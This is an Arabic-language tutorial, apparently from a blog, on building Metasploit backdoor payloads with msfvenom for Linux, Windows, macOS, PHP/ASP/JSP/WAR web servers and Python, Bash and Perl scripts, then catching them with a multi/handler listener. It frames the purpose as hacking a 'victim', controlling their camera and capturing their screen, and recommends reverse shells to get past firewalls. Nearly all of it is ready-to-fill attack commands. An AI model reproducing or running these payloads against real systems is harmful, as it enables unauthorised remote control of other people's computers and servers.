طريقة تكوين بايلود لجميع الأنظمة Creating Metasploit Payloads

0
طريقة تكوين بايلود لجميع الأنظمة Creating Metasploit Payloads
أهم مشروع موجود بنظام الكالي لينكس هو مشروع الميتاسبلويت, والذي يفيدنا بعدة أغراض منها انشاء بايلود والتحكم به بعد اختراق الضحية, وارسال تعليمات مثل التحكم في الكاميرا وتسجيل لقطات من على سطح مكتب الضحية أو من هاتفه وغيرها من الأوامر, في هذا المقال سنتعرف على أهم خطوة وهي طريقة تكوين بايلود ومن لا يعرف البايلود يمكن تشبيهه بالسيرفر في برامج الرات والذي يسمى تروجان Trojan أو باكدور Backdoor.
في مشروع الميتاسبلويت كانت هناك أداة في السابق تسمى MsfPayload منخلالها كنا نقوم بصنع البايلود, اما في النسخ الحديثة قاموا بتغييرها الى أداة msfvenom والتي سنستخدمها في شرحنا موضحة كما في الصورة.
msfvenom طريقة تكوين بايلود على جميع الأجهزة
في التعليمات التي سنسردها أسفله تحتاج لضبط بعض التعليمات على حسب احتياجاتك ومتطلبات الثغرة على سبيل المثال:
  • تضع مكان LPORT البورت المفتوح في جهازك (مثلا: 88,4444,443) والذي ستتصل عبره مع الضحية, وهو اختصار ل Local Port
  • تضع مكان LHost الاي بي الخاص بك, اذا كنت تخترق داخل الشبكة تستعمل الاي بي الداخلي شكله 192.168.1.3 وان كنت تخترق في جهاز خارج الشبكة أي بعيد عنك تدخل الاي بي الخارجي ومن الأفضل النو اي بي No-ip
  • في حالات أخرى تجد RHost وهي تعني اي بي الضحية RemoteHost لم نتظرق لها في هذا الشرح.
  • عند تعويض التعليمات باعداداتك لا تكتب الرموز الاتي < > مع الاوامر فهي لغرض التوضيح فقط.
  • في البايلودات استعملت البايلود العكسي reverse_tcp وهو الأفضل لأنه عندما يشتغل في جهاز الضحية هو من سيتصل بجهازك وبهذا ستتخطى مشكل الجدار الناري. على عكس البايلود bind_tcp وغيره.

لاظهار جميع البايلودات المتوفرة في الميتاسبلويت

msfvenom -l
لاظهار جميع البايلودات المتوفرة في الميتاسبلويت

طريقة تكوين بايلود تنفيذي على أنظمة مختلفة

تكوين بايلود يخترق لينكس

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf > shell.elf

تكوين بايلود يخترق ويندوز

msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > shell.exe
صورة بعد تطبيق الأمر
حجم الباكدور الناتج 73 كيلوبايت بدون تشفير

تكوين بايلود يخترق ماكنتوش

msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f macho > shell.macho

طريقة تكوين بايلود الويب Web Payloads

تكوين بايلود يخترق السيرفرات بصيغة بلغة php

msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -f raw > shell.php
cat shell.php | pbcopy && echo ' shell.php && pbpaste >> shell.php

تكوين بايلود يخترق السيرفرات بصيغة بلغة asp

msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp > shell.asp

تكوين بايلود يخترق السيرفرات بصيغة بلغة jsp

msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp

تكوين بايلود يخترق السيرفرات بصيغة بلغة war

msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > shell.war

طريقة تكوين سكربت بايلود Scripting Payloads

تكوين بايلود بلغة بايثون

Python
msfvenom -p cmd/unix/reverse_python LHOST= LPORT= -f raw > shell.py

تكوين بايلود بلغة باش

Bash
msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -f raw > shell.sh

تكوين بايلود بلغة بيرل

Perl
msfvenom -p cmd/unix/reverse_perl LHOST= LPORT= -f raw > shell.pl

طريقة تكوين شيل كود لدمجه في اكسبلويت exploits

بالنسبة لاظهار جميع تعليمات الشيل كود الصالحة، ادخل الأمر الأتي في الطرفية 
msfvenom --help-format

Linux Based Shellcode

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f

Windows Based Shellcode

msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f

Mac Based Shellcode

msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f

اعداد المتحكم أو مقبض البايلود Handlers

للتحكم في البايلود بعد اختراق الضحية وجب عليك فتح مشروع الميتاسبلويت بالامر
msfconsole
ثم قم بادخال اتعلييمات الأتية:
use exploit/multi/handler
set PAYLOAD
set LHOST
set LPORT
set ExitOnSession false
exploit -j -z